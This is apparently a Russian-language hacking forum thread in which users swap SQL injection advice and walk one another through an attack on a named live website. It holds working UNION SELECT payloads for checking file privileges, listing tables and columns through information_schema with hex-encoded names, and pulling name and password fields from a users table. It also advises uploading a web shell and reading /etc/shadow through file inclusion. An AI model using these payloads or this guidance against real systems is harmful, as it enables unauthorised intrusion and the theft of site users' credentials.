на сколько я понимаю апач тут не при чем у тебя же идет запрос к БД а не к апачу или ПО которое ты там написал, ЗЫ проще попробовать а потом спросить
Не парьтесь, залейте для начала шелл, дальше по обстановке и в связи с осознанием полученной информации Плюс если у вас LFI или читалка - это даёт гораздо большие возможности, чем просто даже сразу (допустим) прочитать /etc/shadow Хотя бывает и такое забавно. Правда, забавно. Ну тогда сушить вёсла, наверное
2 BlackSun: Ну если пароль расшифруешь, то да, о Генианельнейший из Гениев http://s40.radikal.ru/i087/0905/8e/a0bb203ffe39.jpg ыыыыыыы PS: бывают такие LFI, что /etc/shadow можно прочитать, но это не значит, что вы сможете залить хотя бы даже ВЕБ-ШЕЛЛ
Например: http://google.com/news.php?id=0+union+select+1,File_priv,3+from+mysql.user-- так мы узнаем File_priv
magic_quotes = off или On http://google.com/news.php?id=0+union+select+1,'p',3+from+mysq l.user-- если результатом будет буква p тогда M_Q=off если же будет ошибка , тогда M_Q=on
А если колонки не подобрал.....а если запрос не закрыл...(и ещё пару десятков вариантов)и вылезла ошибка..значит MQ=On? думай что пишешь.
не могу найти принтабельный столбец, хотя вроде их всего 1 ) http://www.aawow.info/question2.php?id=-31+union+select+1-- хелп)
http://www.aawow.info/question2.php?id=-31+union+select+version() В тайтле смотри 5.0.81-community-log
пытаюсь названия таблиц вывести таким запросом: http://www.aawow.info/question2.php?id=-31+union+select+table_name+from+information_schema.tables+where+table_schema=%27aawowinf_wow%27 в ответ - ошибка.....
http://www.aawow.info/question2.php?id=-31+union+select+table_name+from+information_schema.tables+where+table_schema=0x6161776f77696e665f776f77 Может стоит немного почитать статьи ? (
ElteRUS, читал, но просто прочитать, а потом раскрутить любую скулю сложно... нашел интересные имена таблиц, users и userlist, подставляю их в запрос: http://www.aawow.info/question2.php?id=-31+union+select+column_name+from+information_schema.columns+where+table_name=7573657273 выводит WoW в тайтле. Как получить всю интересующую нас инфу из этой таблицы? Если возможно, то без Limit?
group_concat() _http://www.aawow.info/question2.php?id=-31+union+select+group_concat(column_name)+from+information_schema.columns+where+table_name=0x757365726c697374 0x757365726c697374 = userlist
Если не ошибаюсь то надо не table_name а table_schema Темболее нужно в хекс коде (точнее: 0x + HEX) подставлять если работаешь через where (если фильтруются ковычки)
в таблице users оказалисьнесколько интересных записей: name, pass Делаю запрос: http://www.aawow.info/question2.php?id=-31+union+select+concat(name,0x20,pass)+from+0x7573657273 Пробовал переводить в хекс и нэйм и пасс, ничего хорошего не выходит...